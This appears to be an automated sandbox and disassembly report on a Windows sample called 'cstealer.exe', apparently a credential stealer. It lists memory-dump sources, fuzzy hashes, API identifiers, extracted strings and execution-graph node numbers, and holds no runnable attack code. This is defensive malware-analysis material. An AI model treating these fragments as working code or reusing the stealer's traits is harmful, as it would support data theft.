                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction ID: cc50ad4d6de62d2f2fc1a9096f9cef3bcda799524b02dbb677603e192e6a5001
                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction Fuzzy Hash: 2671E7362097818AEF36DFAD99483AA6794FB85B84F540C26DD0D53FC9FE39C6518B00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: 99d51d8c1563c024a6a4003a21456af2e210fd5019e2bf33a84d5193e606a3d7
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: AA617D3360EB448AEB20DFA9D44479DB7A6FB48B88F144615EF4D17B99DB38D066CB00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction ID: 8ab49c1efad89ae9f952b3e375ca7155581638904d842669b19501a56b321b67
                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction Fuzzy Hash: 8151CD7220E78189FA368FADA09C3AA6751FF85B40F440D25DE4D13FC9FA39C5648B40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                            • String ID: ?
                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                            • Opcode ID: f890908d659084ad7121073ce0088269a90ad82ae80dac5e2e3914c615d8a80e
                                                                                                                                                            • Instruction ID: 99111d3a34924b7afd2fabdb5fd14e3016951b4f41c82dcd6357cf6c8786ee18
                                                                                                                                                            • Opcode Fuzzy Hash: f890908d659084ad7121073ce0088269a90ad82ae80dac5e2e3914c615d8a80e
                                                                                                                                                            • Instruction Fuzzy Hash: 4C414952A0926245FB709B36F6113BA66D0FB80FA4F144276EE5D86AD9DF3CD841C700
                                                                                                                                                            APIs
                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6957F9DFA
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: HeapFree.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB716
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: GetLastError.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB720
                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6957EC335), ref: 00007FF6957F9E18
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                            • API String ID: 3580290477-834118082
                                                                                                                                                            • Opcode ID: c42a6c659c5db1ae71af4eb7c2a93e6566414c7d452b3721f18450dfb04df98c
                                                                                                                                                            • Instruction ID: 1d74c0cacb6b9c87f1dcefeeb9fea926d01cb3ea06e9dad0b99ebdffd4793235
                                                                                                                                                            • Opcode Fuzzy Hash: c42a6c659c5db1ae71af4eb7c2a93e6566414c7d452b3721f18450dfb04df98c
                                                                                                                                                            • Instruction Fuzzy Hash: DF417E36A09B1289EB24DF25E9800B967D5EB44FD4F544076ED4E8BB89DF3CEE819340
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                                                                                            • Instruction ID: b78c6abf162a42943f83324d90dc5999837a4762d7da547ee0f2811ecc2e3614
                                                                                                                                                            • Opcode Fuzzy Hash: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                                                                                            • Instruction Fuzzy Hash: B541B132A19A8185DB20CF25E8443BAA7A1FB88BD4F444031EE4DCB798EF3CD941D750
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction ID: f42f6fd569d43ea4382f1c0abe0182af73a8386dd1a9165ea43a17db13baa3af
                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction Fuzzy Hash: F641A8B271AA4089DB31DF69E4483AA77A0FB98794F904421EE4D87794EF7CC455CB40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                            • Opcode ID: d9863b25c12ac0fefb21a7bf7c484e36ee931251d3e87798423fc60bfb7291bd
                                                                                                                                                            • Instruction ID: d878d100043e8d56e43cf19c06570f0211f114040bd550dbcb535f3d6b55846f
                                                                                                                                                            • Opcode Fuzzy Hash: d9863b25c12ac0fefb21a7bf7c484e36ee931251d3e87798423fc60bfb7291bd
                                                                                                                                                            • Instruction Fuzzy Hash: 8221C122A1969181EB30AB25D5442AE73E2FB84F84F858076DA8D87284DF7CEE45CB41
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                            • Opcode ID: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                                                                                            • Instruction ID: 8ccb5e653de5139363814517a7042d39eab72c3539744104a5aa713e10278eb3
                                                                                                                                                            • Opcode Fuzzy Hash: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                                                                                            • Instruction Fuzzy Hash: AE21887262878191E730DB20F4516EAA394FF84B84F801176D64D879A9DF3CD709CB00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: Error detected
                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                            • Opcode ID: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                                                                                            • Instruction ID: 8c0444ec1c26dbd7c325b086ac862f1d25ecb2fb465f17fa7a87c455d145822c
                                                                                                                                                            • Opcode Fuzzy Hash: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                                                                                            • Instruction Fuzzy Hash: C421677262878191E730DB10F4516EAA394FF94B84F805176E78D87A69DF3CDB05CB40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                                                                                            • Instruction ID: 16162d5174ec1c40d46afcb172cf5d9581328b9f54016fcbfc492eb4baacea91
                                                                                                                                                            • Opcode Fuzzy Hash: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                                                                                            • Instruction Fuzzy Hash: B1114932609B8182EB608F25E400269B7E1FB88B88F184271DE8D4BB64DF3CC951CB00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction ID: e87662b7ffd1269b0497a5aa786c94faae08ef5a1363e8958afb757bc222f382
                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction Fuzzy Hash: 41112132219B4086EB618F59E44435977E5FB88B94F584620DF8C07B98EF3CC561CB00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                            • Opcode ID: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                                                                                            • Instruction ID: 8e895c3d840ad1f5f2e2fb8943ec80ed47fd959efa45e4905e6ef3efc42ede33
                                                                                                                                                            • Opcode Fuzzy Hash: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                                                                                            • Instruction Fuzzy Hash: 0701716191D65286F7309F7098522BA63E0EF45B58F400476D94ECA695EE2CEA04DB14
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                            • API String ID: 592178966-758928094
• Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
• Instruction ID: e24a849e4829551db3e8bc093f8c75e09aa5b21a45df6bee98af7aa06a626cc0
• Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
• Instruction Fuzzy Hash: 9EE086B1655B8494DF118F65E8542D873A1DF68B64B589122D95C46311FA3CD1F9C700
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction ID: 56ada5da361412997f75e9e926602d97c2a815f801f531dff807d9af8eab2ada
• Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction Fuzzy Hash: 63E086B1615B4484DF118F65D8541D87361EB68B54B989122C94C46311FA3CE1F5C700
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: 344fe1eeea64fa653468000672f2fe16f1c501ed5641cdfbedc696ed478d3263
• Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction Fuzzy Hash: 52116375606B4489EE64DFDE940836A63A1FF89FC0F584825DF4D577A6EE38C4518700
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction ID: f1886c7b2c9d4fe48e264ab43f107b5e51246b2145f34501438fd78b7e8d6320
• Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction Fuzzy Hash: 1FE03075602A048AE7148F9AD80834A36E1EF89F05F4484148B4907392DF7DC4A5CB50

Execution Graph

Execution Coverage: 9.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 41
                                                                                                                                                            execution_graph 20889 7ff6d6ebbea9 20890 7ff6d6ebbeb8 20889->20890 20892 7ff6d6ebbec2 20889->20892 20893 7ff6d6eb1208 LeaveCriticalSection 20890->20893 19949 7ff6d6eb1720 19950 7ff6d6eb1744 19949->19950 19953 7ff6d6eb1754 19949->19953 19951 7ff6d6ea5cb4 _set_fmode 11 API calls 19950->19951 19974 7ff6d6eb1749 19951->19974 19952 7ff6d6eb1a34 19954 7ff6d6ea5cb4 _set_fmode 11 API calls 19952->19954 19953->19952 19955 7ff6d6eb1776 19953->19955 19956 7ff6d6eb1a39 19954->19956 19957 7ff6d6eb1797 19955->19957 20080 7ff6d6eb1ddc 19955->20080 19959 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19956->19959 19960 7ff6d6eb1809 19957->19960 19962 7ff6d6eb17bd 19957->19962 19966 7ff6d6eb17fd 19957->19966 19959->19974 19964 7ff6d6eaf948 _set_fmode 11 API calls 19960->19964 19979 7ff6d6eb17cc 19960->19979 19961 7ff6d6eb18b6 19973 7ff6d6eb18d3 19961->19973 19980 7ff6d6eb1925 19961->19980 20095 7ff6d6eaa474 19962->20095 19967 7ff6d6eb181f 19964->19967 19966->19961 19966->19979 20101 7ff6d6eb81dc 19966->20101 19970 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19967->19970 19969 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19969->19974 19975 7ff6d6eb182d 19970->19975 19971 7ff6d6eb17e5 19971->19966 19978 7ff6d6eb1ddc 45 API calls 19971->19978 19972 7ff6d6eb17c7 19976 7ff6d6ea5cb4 _set_fmode 11 API calls 19972->19976 19977 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19973->19977 19975->19966 19975->19979 19983 7ff6d6eaf948 _set_fmode 11 API calls 19975->19983 19976->19979 19981 7ff6d6eb18dc 19977->19981 19978->19966 19979->19969 19980->19979 19982 7ff6d6eb422c 40 API calls 19980->19982 19989 7ff6d6eb18e1 19981->19989 20137 7ff6d6eb422c 19981->20137 19984 7ff6d6eb1962 19982->19984 19987 7ff6d6eb184f 19983->19987 
19985 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19984->19985 19988 7ff6d6eb196c 19985->19988 19992 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19987->19992 19988->19979 19988->19989 19990 7ff6d6eb1a28 19989->19990 19995 7ff6d6eaf948 _set_fmode 11 API calls 19989->19995 19994 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19990->19994 19991 7ff6d6eb190d 19993 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19991->19993 19992->19966 19993->19989 19994->19974 19996 7ff6d6eb19b0 19995->19996 19997 7ff6d6eb19c1 19996->19997 19998 7ff6d6eb19b8 19996->19998 20000 7ff6d6eab25c __std_exception_copy 37 API calls 19997->20000 19999 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19998->19999 20001 7ff6d6eb19bf 19999->20001 20002 7ff6d6eb19d0 20000->20002 20007 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20001->20007 20003 7ff6d6eb1a63 20002->20003 20004 7ff6d6eb19d8 20002->20004 20006 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20003->20006 20146 7ff6d6eb82f4 20004->20146 20009 7ff6d6eb1a77 20006->20009 20007->19974 20012 7ff6d6eb1aa0 20009->20012 20020 7ff6d6eb1ab0 20009->20020 20010 7ff6d6eb1a20 20015 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20010->20015 20011 7ff6d6eb19ff 20013 7ff6d6ea5cb4 _set_fmode 11 API calls 20011->20013 20014 7ff6d6ea5cb4 _set_fmode 11 API calls 20012->20014 20016 7ff6d6eb1a04 20013->20016 20017 7ff6d6eb1aa5 20014->20017 20015->19990 20018 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20016->20018 20018->20001 20019 7ff6d6eb1d93 20022 7ff6d6ea5cb4 _set_fmode 11 API calls 20019->20022 20020->20019 20021 7ff6d6eb1ad2 20020->20021 20023 7ff6d6eb1aef 20021->20023 20165 7ff6d6eb1ec4 20021->20165 20024 7ff6d6eb1d98 20022->20024 20027 7ff6d6eb1b63 20023->20027 20029 7ff6d6eb1b17 20023->20029 20036 7ff6d6eb1b57 
20023->20036 20026 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20024->20026 20026->20017 20032 7ff6d6eaf948 _set_fmode 11 API calls 20027->20032 20047 7ff6d6eb1b26 20027->20047 20050 7ff6d6eb1b8b 20027->20050 20028 7ff6d6eb1c16 20041 7ff6d6eb1c33 20028->20041 20046 7ff6d6eb1c86 20028->20046 20180 7ff6d6eaa4b0 20029->20180 20037 7ff6d6eb1b7d 20032->20037 20034 7ff6d6eaf948 _set_fmode 11 API calls 20040 7ff6d6eb1bad 20034->20040 20035 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20035->20017 20036->20028 20036->20047 20186 7ff6d6eb809c 20036->20186 20044 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20037->20044 20038 7ff6d6eb1b21 20045 7ff6d6ea5cb4 _set_fmode 11 API calls 20038->20045 20039 7ff6d6eb1b3f 20039->20036 20049 7ff6d6eb1ec4 45 API calls 20039->20049 20042 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20040->20042 20043 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20041->20043 20042->20036 20048 7ff6d6eb1c3c 20043->20048 20044->20050 20045->20047 20046->20047 20051 7ff6d6eb422c 40 API calls 20046->20051 20047->20035 20054 7ff6d6eb422c 40 API calls 20048->20054 20056 7ff6d6eb1c42 20048->20056 20049->20036 20050->20034 20050->20036 20050->20047 20052 7ff6d6eb1cc4 20051->20052 20053 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20052->20053 20055 7ff6d6eb1cce 20053->20055 20058 7ff6d6eb1c6e 20054->20058 20055->20047 20055->20056 20057 7ff6d6eb1d87 20056->20057 20061 7ff6d6eaf948 _set_fmode 11 API calls 20056->20061 20060 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20057->20060 20059 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20058->20059 20059->20056 20060->20017 20062 7ff6d6eb1d13 20061->20062 20063 7ff6d6eb1d24 20062->20063 20064 7ff6d6eb1d1b 20062->20064 20065 7ff6d6eb1344 _wfindfirst32i64 37 API calls 20063->20065 
